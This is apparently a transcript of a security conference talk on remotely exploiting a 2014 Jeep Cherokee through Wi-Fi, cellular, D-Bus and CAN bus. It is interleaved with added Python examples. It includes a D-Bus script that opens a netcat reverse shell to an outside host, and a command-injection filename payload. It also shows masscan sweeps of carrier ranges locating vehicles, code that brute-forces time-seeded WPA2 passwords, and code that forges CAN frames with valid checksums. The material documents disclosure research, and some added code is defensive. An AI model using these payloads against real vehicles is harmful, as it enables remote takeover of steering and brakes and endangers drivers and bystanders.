TRANSCRIPT
Remote Exploitation of an Unaltered Passenger Vehicle
Dr. Charlie Miller ([email protected])
Chris Valasek ([email protected])
Introduction
You should know us by now…
• Dr. Charlie Miller, Security Engineer, Twitter (@0xcharlie)
• Chris Valasek, Director of Vehicle Security Research, IOActive (@nudehaberdasher)
Disclaimer
• Enjoy the talk
• The full details will be in our 90 page white paper
• To be released Aug 10
Public service announcement
Please STOP saying UNHACKABLE, you’re going to look silly
Overview
• Introduction
• Getting remote code running via Wi-Fi
• Expanding to cellular
• Head unit payloads
• Flashing CAN chip
• Cyberphysical payloads
Remote Attacks
Remote Attack Paradigm
Remote entry points into the vehicle:
• TPMS
• Telematics (CDMA/3G/4G/LTE)
• Bluetooth
• Wi-Fi
• In-car apps
• Remote keyless entry
Once the exploit is running on the compromised unit, the attacker lateralizes over the in-vehicle buses (CAN / LIN / MOST / Flexray) to reach the ECUs that matter:
• Engine
• Sensors
• Occupant safety
• Power Steering
• Self-Parking
• Radio
• Transmission
• ABS
• Pre-Collision System
• Adaptive Cruise Control
The four steps:
1. Remote compromise
2. Lateralization
3. CAN message analysis (in advance)
4. CAN message injection
• Reprogram firmware
• Functionality
The Vehicle
2014 Jeep Cherokee
http://www.blogcdn.com/www.autoblog.com/media/2013/02/2014-jeep-cherokee-1.jpg
Uconnect 8.4AN RA4 (Harman Kardon)
# pidin info
CPU:ARM Release:6.5.0 FreeMem:91Mb/512Mb BootTime:Jul 30 21:45:38 2014
Processes: 107, Threads: 739
Processor1: 1094697090 Cortex A8 800MHz FPU
Jail Break
Jailbreaking the Uconnect
• Was NOT required for remote exploit
• Was invaluable for gaining knowledge about the OS / services
• NOT, I repeat, NOT needed for remote exploitation
Wi-Fi
Problems with attacks over Wi-Fi
• Not on by default
• Need to connect to WPA2 network
WPA2 password

/* Decompiled from WifiSvc: the only entropy is the wall-clock second
   at which the service started, fed straight into srand(). */
char *get_password() {
    int c_max = 12;
    int c_min = 8;
    unsigned int t = time(NULL);
    srand(t);
    unsigned int len = (rand() % (c_max - c_min + 1)) + c_min;   /* 8..12 characters */
    char *password = malloc(len);
    int v9 = 0;
    do {
        unsigned int v10 = rand();
        int v11 = convert_byte_to_ascii_letter(v10 % 62);     /* 62-symbol alphabet */
        password[v9] = v11;
        v9++;
    } while (len > v9);
    return password;
}
Password guessing
• Password based on when unit was first started
• With second precision
• We know the year, if you guess the month
• 15 million password possibilities
• If you suppose it was during the day
• 7 million password possibilities
• Should be possible to brute force in under an hour
Setting the time…

local rtcTime = getV850RealtimeClock()
local rtcValid = false
if rtcTime == nil or rtcTime.year == 65535 or rtcTime.month == 255 or rtcTime.day == 255 or
   rtcTime.hour == 255 or rtcTime.min == 255 or rtcTime.sec == 255 then
  dbg.print("Clock: start -- V850 time not received or is set to factory defaults")
  ...
if rtcValid == false then
  dbg.print("Clock: start -- Unable to create the UTC time from V850")
  setProperty("timeFormat24", false)
  setProperty("enableClock", true)
  setProperty("gpsTime", true)
  setProperty("manualUtcOffset", 0)
  -- No valid RTC: fall back to a fixed default, which is the time() that seeds the Wi-Fi password
  defTime = {}
  defTime.year = 2013
  defTime.month = 1
  defTime.day = 1
  defTime.hour = 0
  defTime.min = 0
  defTime.sec = 0
  defTime.isdst = false
  setSystemUTCTime(os.time(defTime))
  timeFormatOverride = false
  enableClockOverride = false
end
Actually it’s easy!
• My WPA2 password was “TyYMxfPhZxkp”
• This corresponds to Epoch time 0x50e22720
• This is Jan 01 2013 00:00:32 GMT
• Took 32 seconds for WifiSvc to get started up
• Really only a few dozen passwords to try
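The enumeration an attacker runs against a generator like get_password(), as an added example (not code from the talk or its white paper): seed one candidate per second starting at the 2013-01-01 00:00:00 UTC fallback clock value, derive each password exactly the way the decompiled routine does, and compare the candidate count with the keyspace a genuinely random 8–12 character password would have. QNX libc's rand() and the letter order used by convert_byte_to_ascii_letter are not reproduced here; CRand and ALPHABET are labelled stand-ins, so the strings printed differ from the unit's, but the seed arithmetic and the size of the candidate list are the point.

```python
"""Enumerate WPA2 password candidates for a time-seeded generator.

Added example, not the talk's code. The real generator calls srand(time(NULL))
and QNX libc's rand(); that PRNG is not reproduced. CRand is an ASSUMED
stand-in LCG so the logic runs offline; to reproduce the talk's
"TyYMxfPhZxkp" you would swap in the device's rand() and alphabet order.
"""
import calendar

# 62-symbol alphabet; the ordering is an assumption (the decompiled
# convert_byte_to_ascii_letter maps 0..61 to letters and digits in some order).
ALPHABET = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
C_MIN, C_MAX = 8, 12                       # c_min / c_max in get_password()

# Factory-default RTC fallback from the Lua clock code: 2013-01-01 00:00:00 UTC.
DEFAULT_EPOCH = calendar.timegm((2013, 1, 1, 0, 0, 0))   # == 0x50e22700


class CRand:
    """Stand-in for C srand()/rand(): a textbook 32-bit LCG (ASSUMPTION, not QNX's)."""

    def __init__(self, seed):
        self.state = seed & 0xFFFFFFFF

    def rand(self):
        self.state = (self.state * 1103515245 + 12345) & 0xFFFFFFFF
        return (self.state >> 16) & 0x7FFF


def generate_password(seed, rng_factory=CRand):
    """Mirror of get_password(): length = rand() % 5 + 8, then one rand() per character."""
    rng = rng_factory(seed)
    length = (rng.rand() % (C_MAX - C_MIN + 1)) + C_MIN
    return "".join(ALPHABET[rng.rand() % 62] for _ in range(length))


def candidate_passwords(base_epoch=DEFAULT_EPOCH, window_seconds=120, rng_factory=CRand):
    """Every password the generator can emit if WifiSvc started within
    window_seconds of the default clock value: one seed per second."""
    return [generate_password(base_epoch + s, rng_factory) for s in range(window_seconds)]


def full_keyspace():
    """Number of 8..12 character strings over 62 symbols: what a random password would cost."""
    return sum(62 ** n for n in range(C_MIN, C_MAX + 1))


if __name__ == "__main__":
    cands = candidate_passwords()
    print("seed behind the talk's password:", hex(DEFAULT_EPOCH + 32))
    print("candidates to try:", len(cands), "vs random keyspace:", full_keyspace())
    for s, pw in list(enumerate(cands))[:5]:
        print(f"t+{s:3d}s  {pw}")
```

The window is the only parameter that matters: the talk's unit came up 32 seconds after the fallback time, so a window of a couple of minutes covers any realistic WifiSvc start-up delay, and each candidate is one WPA2 association attempt.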
Starting Nmap 6.01 ( http://nmap.org ) at 2015-07-26 11:23 CDT
Nmap scan report for 192.168.5.1
Host is up (0.0036s latency).
PORT      STATE SERVICE
2011/tcp  open  raid-cc
2021/tcp  open  servexec
4400/tcp  open  unknown
6010/tcp  open  x11
6020/tcp  open  unknown
6667/tcp  open  irc
51500/tcp open  unknown
65200/tcp open  unknown
Nmap done: 1 IP address (1 host up) scanned in 0.17 seconds
D-Bus
D-Bus: Overview
• Interprocess communications
• Can require authentication
• Jeep did NOT
• We used Dfeet to look at services
• Dbus-Python for scripts / exploits
telnet 192.168.5.1 6667
Trying 192.168.5.1...
Connected to 192.168.5.1.
Escape character is '^]'.
AUTH ANONYMOUS
OK
4943a53752f52f82a9ea4e6e00000001
BEGIN
D-Bus: Services & Methods
D-Bus: Command Line Injection
function methods.rmTrack(params, context)
return {
result = os.execute("rm \"" .. trail_path_saved ..
params.filename .. "\"")
}
end
NavTrailService
* Many others contained command line injection vulnerabilities
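The rmTrack() handler above, rebuilt in Python as an added example (not the talk's code) so the injection can be examined offline next to a hardened version. The Lua concatenates the caller-supplied filename into `rm "<trail_path_saved><filename>"` and hands the string to os.execute(); build_rm_shell_command() mirrors that construction and is_injected() tokenises the result the way a POSIX shell would, while safe_rm_argv() shows the fix: allow-list the name and pass an argv list so no shell ever parses attacker input. TRAIL_DIR and the sample filenames are constructed for illustration.

```python
"""Command-line injection in a D-Bus method handler, beside a hardened form.

Added example, not the talk's code. build_rm_shell_command() mirrors the
vulnerable Lua string construction; safe_rm_argv() is the corrected handler.
TRAIL_DIR and the sample filenames are constructed for illustration.
"""
import re
import shlex

TRAIL_DIR = "/fs/usb0/trails/"      # ASSUMED stand-in for trail_path_saved
SHELL_OPS = {";", "|", "||", "&", "&&"}
SAFE_NAME = re.compile(r"[A-Za-z0-9_][A-Za-z0-9_.-]{0,63}")   # no '/', no leading '.', no metacharacters


def build_rm_shell_command(filename):
    """Mirror of the vulnerable rmTrack(): the filename is spliced straight into a
    shell command line. The string is returned, never executed."""
    return 'rm "' + TRAIL_DIR + filename + '"'


def shell_tokens(command):
    """Tokenise as a POSIX shell would: quotes honoured, ; | & split into their own tokens."""
    lex = shlex.shlex(command, posix=True, punctuation_chars=True)
    lex.whitespace_split = True
    return list(lex)


def is_injected(command):
    """Oracle: a filename that is only a filename yields exactly ['rm', path].
    A second command, a pipe or a command substitution means the caller broke out."""
    tokens = shell_tokens(command)
    return (len(tokens) != 2 or any(t in SHELL_OPS for t in tokens)
            or "$(" in command or "`" in command)


def safe_rm_argv(filename):
    """Hardened handler: validate against the allow-list, then return an argv list
    for subprocess.run(argv), so the shell never sees the input.
    (os.remove() on the validated path would avoid spawning a process at all.)"""
    if not SAFE_NAME.fullmatch(filename):
        raise ValueError("rejected filename: %r" % (filename,))
    return ["rm", "--", TRAIL_DIR + filename]


if __name__ == "__main__":
    samples = ("track1.gpx", 'x"; netcat -l -p 6666 | /bin/sh; echo "', "../../etc/passwd")
    for name in samples:
        cmd = build_rm_shell_command(name)
        print("%-45r injected=%s" % (name, is_injected(cmd)))
        try:
            print("   hardened argv:", safe_rm_argv(name))
        except ValueError as e:
            print("   hardened:", e)
```

The second sample closes the quote the Lua opened, runs its own pipeline, and reopens a quote so the trailing `"` still balances; that is why a hardened handler rejects on an allow-list rather than trying to escape quotes.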
D-Bus: No vulnerability needed
NavTrailService
"com.harman.service.NavTrailService":
{"name":"com.harman.service.NavTrailService",
 "methods":{"symlinkattributes":"symlinkattributes","getProperties":"getProperties","execute":"execute","unlock":"unlock","navExport":"navExport","ls":"ls","attributes":"attributes", …
#!python
import dbus
# Unauthenticated D-Bus over TCP: anyone who can reach port 6667 can call any method.
bus_obj=dbus.bus.BusConnection("tcp:host=192.168.5.1,port=6667")
proxy_object=bus_obj.get_object('com.harman.service.NavTrailService','/com/harman/service/NavTrailService')
playerengine_iface=dbus.Interface(proxy_object,dbus_interface='com.harman.ServiceIpc')
# The service's own "execute" method runs a shell command: here a reverse shell back to 192.168.5.109
print(playerengine_iface.Invoke('execute','{"cmd":"netcat -l -p 6666 | /bin/sh | netcat 192.168.5.109 6666"}'))
We basically revealed the vulnerability last year!
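A check for the property that made all of the above possible, as an added example that is not the talk's code: the D-Bus authentication preamble shown in the telnet session (AUTH ANONYMOUS, OK plus server GUID, BEGIN) is all that is needed to tell whether a bus listener is open to anyone who can reach the port. dbus_anonymous_check() speaks that exchange over any object with sendall()/recv(); FakeBus is a constructed in-memory stand-in for the daemon so the exchange runs offline, and check_host() is the live variant for pointing at a real device.

```python
"""Check whether a D-Bus TCP listener accepts unauthenticated (ANONYMOUS) clients.

Added example, not the talk's code. Only the auth preamble is spoken; the
message framing that follows BEGIN is not needed for the check. FakeBus and
its behaviour are constructed for the offline demo.
"""
import socket


def _readline(transport, limit=4096):
    buf = b""
    while not buf.endswith(b"\r\n") and len(buf) < limit:
        chunk = transport.recv(1)
        if not chunk:
            break
        buf += chunk
    return buf.decode("ascii", "replace")


def dbus_anonymous_check(transport, send_nul=True):
    """Run AUTH ANONYMOUS over `transport` (an object with sendall()/recv(), e.g. a socket).
    Returns (accepted, detail): detail is the server GUID on success, otherwise the
    REJECTED line (which lists the mechanisms the daemon does accept) or whatever
    unexpected reply came back. The D-Bus spec has the client send one NUL byte
    before its first command; the Uconnect telnet session on the page got an OK
    without it, so send_nul is a switch rather than fixed behaviour."""
    if send_nul:
        transport.sendall(b"\0")
    transport.sendall(b"AUTH ANONYMOUS\r\n")
    reply = _readline(transport)
    if reply.startswith("OK "):
        guid = reply[3:].strip()
        transport.sendall(b"BEGIN\r\n")     # from here the connection carries message frames
        return True, guid
    return False, reply.strip()


class FakeBus:
    """In-memory stand-in for a D-Bus daemon (constructed for the offline demo)."""
    GUID = "4943a53752f52f82a9ea4e6e00000001"   # the GUID echoed in the page's telnet session

    def __init__(self, allow_anonymous):
        self.allow_anonymous = allow_anonymous
        self.sent = b""       # everything the client sent, for inspection
        self.pending = b""    # bytes queued for the client to recv()

    def sendall(self, data):
        self.sent += data
        if data.strip(b"\0").startswith(b"AUTH ANONYMOUS"):
            if self.allow_anonymous:
                self.pending += b"OK " + self.GUID.encode() + b"\r\n"
            else:
                self.pending += b"REJECTED EXTERNAL DBUS_COOKIE_SHA1\r\n"

    def recv(self, n):
        out, self.pending = self.pending[:n], self.pending[n:]
        return out


def check_host(host, port=6667, timeout=3.0):
    """Live variant: connect to host:port and run the check (not exercised offline)."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        return dbus_anonymous_check(s)


if __name__ == "__main__":
    print("open bus:  ", dbus_anonymous_check(FakeBus(allow_anonymous=True)))
    print("closed bus:", dbus_anonymous_check(FakeBus(allow_anonymous=False)))
```

A daemon that answers OK here hands out its full method surface to the network; a correctly configured one answers REJECTED and names the mechanisms it will negotiate instead.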
Uconnect Payloads
GPS Tracker 3000

#!python
import dbus
bus_obj=dbus.bus.BusConnection("tcp:host=X.X.X.X,port=6667")
proxy_object=bus_obj.get_object('com.harman.service.NDR', '/com/harman/service/NDR')
playerengine_iface=dbus.Interface(proxy_object,dbus_interface='com.harman.ServiceIpc')
print(playerengine_iface.Invoke('JSON_GetProperties','{"inprop":["SEN_GPSInfo"]}'))
HVAC

require "service"
params = {}
control = {}
params.zone = "front"
control.fan = arg[1]
params.controls = control
x = service.invoke("com.harman.service.HVAC", "setControlProperties", params)
Radio Volume

require "service"
params = {}
params.volume = tonumber(arg[1])
x = service.invoke("com.harman.service.AudioSettings", "setVolume", params)
Cellular Exploitation
Netstat Review
# netstat -n | grep LISTEN
tcp 0 0 *.6010 *.* LISTEN
tcp 0 0 *.2011 *.* LISTEN
tcp 0 0 *.6020 *.* LISTEN
tcp 0 0 *.2021 *.* LISTEN
tcp 0 0 127.0.0.1.3128 *.* LISTEN
tcp 0 0 *.51500 *.* LISTEN
tcp 0 0 *.65200 *.* LISTEN
tcp 0 0 *.4400 *.* LISTEN
tcp 0 0 *.6667 *.* LISTEN
Finding the Jeep’s IP
# ifconfig
lo0: flags=8049<UP,LOOPBACK,RUNNING,MULTICAST> mtu 33192
inet 127.0.0.1 netmask 0xff000000
pflog0: flags=100<PROMISC> mtu 33192
uap0: flags=8843<UP,BROADCAST,RUNNING,SIMPLEX,MULTICAST> mtu 1500
address: 30:14:4a:ee:a6:f8
media: <unknown type> autoselect
inet 192.168.5.1 netmask 0xffffff00 broadcast 192.168.5.255
ppp0: flags=8051<UP,POINTOPOINT,RUNNING,MULTICAST> mtu 1472
inet 21.28.103.144 -> 68.28.89.85 netmask 0xff000000
Femto-Cell Comms
• Airave 2.0
• We bought 2 ‘stolen’ ones before getting a working device (Thanks Ebay!)
• Public Jailbreak (turns on port 23)
• Successful in communicating w/ the Jeep!
• Range ~ 30m
How far?
Long Distance Communications (Sprint)
Searching for Vehicles

$ bin/masscan 21.0.0.0/8 -p6667
$ bin/masscan 25.0.0.0/8 -p6667
Discovered open port 6667/tcp on 25.18.2.211
Discovered open port 6667/tcp on 25.36.166.111
Discovered open port 6667/tcp on 25.22.203.32
Discovered open port 6667/tcp on 25.17.146.238
Discovered open port 6667/tcp on 25.22.138.67
Discovered open port 6667/tcp on 25.20.97.217
Discovered open port 6667/tcp on 25.23.97.210
Discovered open port 6667/tcp on 25.33.57.216
Discovered open port 6667/tcp on 25.19.52.6
Discovered open port 6667/tcp on 25.32.29.32
Gathering Vehicle Information
./shutupdave.py
Scanning 21.18.23.0...
Starting masscan 1.0.3 (http://bit.ly/14GZzcT) at 2015-06-16 19:09:28 GMT
-- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 256 hosts [1 port/host]
Scan complete
Found 2 hosts
21.18.23.151 : 1C4RJFCMXEXXXXXXX , 2014 JEEP GRAND+CHEROKEE+OVERLAND
21.18.23.97 : 1C6RR7PT8DXXXXXXX , 2013 RAM 1500+LONGHORN
…
Vehicles Located via Scanning
• 2013 DODGE VIPER
• 2013 RAM 1500
• 2013 RAM 2500
• 2013 RAM 3500
• 2013 RAM CHASSIS 5500
• 2014 DODGE DURANGO
• 2014 DODGE VIPER
• 2014 JEEP CHEROKEE
• 2014 JEEP GRAND CHEROKEE
• 2014 RAM 1500
• 2014 RAM 2500
• 2014 RAM 3500
• 2014 RAM CHASSIS 5500
• 2015 CHRYSLER 200
• 2015 JEEP CHEROKEE
• 2015 JEEP GRAND CHEROKEE
Vehicle Estimates
• We found 19 duplicate VINs in a scan of 2694 vehicles
• Estimated 381,980 +/- 89,393
• We now know that the real number is 1.4 million. We obviously went with a conservative estimate
Uconnect firmware (v850)
Now we send CAN messages?
Inside Uconnect
CANSPI
Inside the Uconnect
Updating the V850: Firmware
# iocupdate -c 4 -p usr/share/V850/cmcioc.bin
• V850 firmware is NOT signed
• No code signing mechanism present
• Updating only works if v850 in “bootrom” mode
V850 Internals: CAN Modules & Addressing
http://am.renesas.com/products/mpumcu/v850/V850esfx/v850esfx3/Documentation.jsp
V850 Internals: CAN Registers
http://am.renesas.com/products/mpumcu/v850/V850esfx/v850esfx3/Documentation.jsp
V850 Internals: Base Address
V850 Internals: Segments & Initial Values
V850 Internals: CAN Data Buffer XREFs
V850 Internals: Setting CAN Data Values
V850 Internals: SPI Parser
file = '/dev/ipc/ch7'
g = assert(ipc.open(file))
f = assert(io.open(file, "r+b"))
g:write(0xf0, 0x02)
bytes = f:read(0x18)
print(hex_dump(bytes))
g:close()
f:close()
V850 Internals: SPI Memory Corruption Bugs
V850 Internals: Sending Arbitrary CAN Msgs
USB-less upgrade
• To flash v850, it needs to be in bootrom mode
• If you put it in bootrom mode, it restarts OMAP in upgrade mode
• Attacker loses control
• Initial bootup code runs from read-only filesystem
• Calls “hd” application which lives in writable portion of filesystem
• Replace hd with your code that can run while v850 in bootrom mode
Make a mistake?
Exploit Chain
Step 1: Find IP address of a vehicle
Step 2: Get code running on OMAP chip
Step 3: Reflash the v850, reboot
Step 4: Send arbitrary CAN messages
Cyber Physical Internals
wiTECH: Overview
wiTECH: Security Unlocks
wiTECH: SecurityAccess
Uc.init("G3n3r@ti0n", "MD5", "", "BC", "AES", new String[]
    {"com.chrysler.lx.UnlockCryptographerTest",
     "com.dcx.securityunlock.encrypted.EncryptedSecurityUnlock", "",
     "com.dcx.NGST.jCanFlash.flashfile.efd2.SecurityUnlockBuilderImpTest"});
PAM: Checksums
Jeep Checksums
IDH: 02, IDL: 0C, Len: 04, Data: 80 00 06 7F
IDH: 02, IDL: 0C, Len: 04, Data: 80 00 08 D9
IDH: 02, IDL: 0C, Len: 04, Data: 80 00 19 09
Prius Checksums
IDH: 02, IDL: E4, Len: 05, Data: 98 00 00 00 83
IDH: 02, IDL: E4, Len: 05, Data: 9A 00 00 00 85
IDH: 02, IDL: E4, Len: 05, Data: 9E 00 00 00 89
PAM: Device
PAM: Checksum Code
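The two checksum schemes behind the frames listed above, as an added example (not the talk's code; the page itself states neither formula). The Prius value is the byte sum of ID high, ID low, DLC and payload mod 256. For the three Jeep PAM frames the trailing byte is reproduced by a CRC-8 with the SAE J1850 parameters (polynomial 0x1D, initial value 0xFF, final XOR 0xFF) over the three data bytes before it; that is an inference from the samples, and the code checks itself against all six frames shown. build_frame() is the piece an injector needs: a forged frame is ignored by the receiving ECU unless its checksum is right.

```python
"""CAN message checksums for the frames shown above: Jeep PAM ID 0x20C, Prius ID 0x2E4.

Added example, not the talk's code. The Jeep rule (CRC-8/SAE J1850 over the
payload) is inferred from the three samples on the page and verified only
against them; other IDs may use other parameters.
"""

FRAMES_FROM_PAGE = [
    # (can_id, data field as captured, including the trailing checksum byte)
    (0x20C, bytes([0x80, 0x00, 0x06, 0x7F])),
    (0x20C, bytes([0x80, 0x00, 0x08, 0xD9])),
    (0x20C, bytes([0x80, 0x00, 0x19, 0x09])),
    (0x2E4, bytes([0x98, 0x00, 0x00, 0x00, 0x83])),
    (0x2E4, bytes([0x9A, 0x00, 0x00, 0x00, 0x85])),
    (0x2E4, bytes([0x9E, 0x00, 0x00, 0x00, 0x89])),
]


def crc8(data, poly=0x1D, init=0xFF, xor_out=0xFF):
    """Bitwise CRC-8, MSB first; the defaults are the SAE J1850 parameters."""
    crc = init
    for b in data:
        crc ^= b
        for _ in range(8):
            crc = ((crc << 1) ^ poly) & 0xFF if crc & 0x80 else (crc << 1) & 0xFF
    return crc ^ xor_out


def jeep_pam_checksum(can_id, payload):
    """Checksum over the payload bytes only; can_id is accepted for a uniform call shape."""
    return crc8(payload)


def prius_checksum(can_id, payload):
    """ID high byte + ID low byte + DLC + payload bytes, mod 256.
    DLC is the length of the whole data field, so it counts the checksum byte too."""
    idh, idl = (can_id >> 8) & 0xFF, can_id & 0xFF
    return (idh + idl + len(payload) + 1 + sum(payload)) & 0xFF


CHECKSUM_BY_ID = {0x20C: jeep_pam_checksum, 0x2E4: prius_checksum}


def frame_is_valid(can_id, data):
    """True if the last byte of `data` is the checksum the receiving ECU expects."""
    return CHECKSUM_BY_ID[can_id](can_id, data[:-1]) == data[-1]


def build_frame(can_id, payload):
    """Forge a frame: append the checksum for the bytes you actually want to inject."""
    return payload + bytes([CHECKSUM_BY_ID[can_id](can_id, payload)])


if __name__ == "__main__":
    for can_id, data in FRAMES_FROM_PAGE:
        print("ID %03X  data %s  valid=%s" % (can_id, data.hex(" "), frame_is_valid(can_id, data)))
    # Changing the third data byte invalidates the captured checksum; recompute it:
    print("forged 0x20C frame:", build_frame(0x20C, bytes([0x80, 0x00, 0x20])).hex(" "))
```

The same structure (dispatch on arbitration ID, recompute on the way out) is what a replay-and-modify tool needs once message analysis has mapped which bytes carry the value being changed.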
Capturing CAN messages
This year…METAL
Cyber Physical action!
Normal CAN messages - example
wipers
Turn signals
speedometer
Diagnostic CAN messages
Diagnostic + Normal CAN messages
1. Normal traffic: the legitimate source ECU sends to the target ECU, and we are on the bus alongside it.
2. Shut down the source of traffic (diagnostic messages).
3. Become the source! We now send to the target ECU in place of the legitimate source.
steering
Braking
Disclosure
Disclosure Timeline
• Oct 24, 2014 -> Vulnerabilities disclosed to FCA
• Mar 2, 2015 -> Disclosed ability to send CAN msgs remotely
• Apr 10, 2015 -> Full scope of hack disclosed
• May 12, 2015 -> FCA informed of cellular vector confirmation
• Jun 2, 2015 -> FCA informed of nation-wide cellular confirmation
• Jul 16, 2015 -> FCA given pre-release copy of our paper/research
• Jul 16, 2015 -> FCA releases Uconnect patch
• Jul 20, 2015 -> Wired article/video
• Jul 24, 2015 -> Sprint network blocks port 6667 traffic
• Jul 24, 2015 -> FCA Recalls 1.4MM vehicles vulnerable to attack
Additional testing?
Impact
Wired story
Recall
stagefright
Conclusion
Conclusions
• Remote compromise of a connected vehicle is possible
• This is NOT just a FCA issue. More connectivity requires more security
• These issues are a combination of: OEMs, Tier-1s, Telecom
• Take this information and look at other cars
• We’re just two bros with one car
• What might be considered an ‘air-gap’ may not be one in reality
• Cellular->Uconnect->Reprogram Firmware->SPI
• Architecture can introduce more hurdles
• Hackers now have an example of making real-world impact
Questions?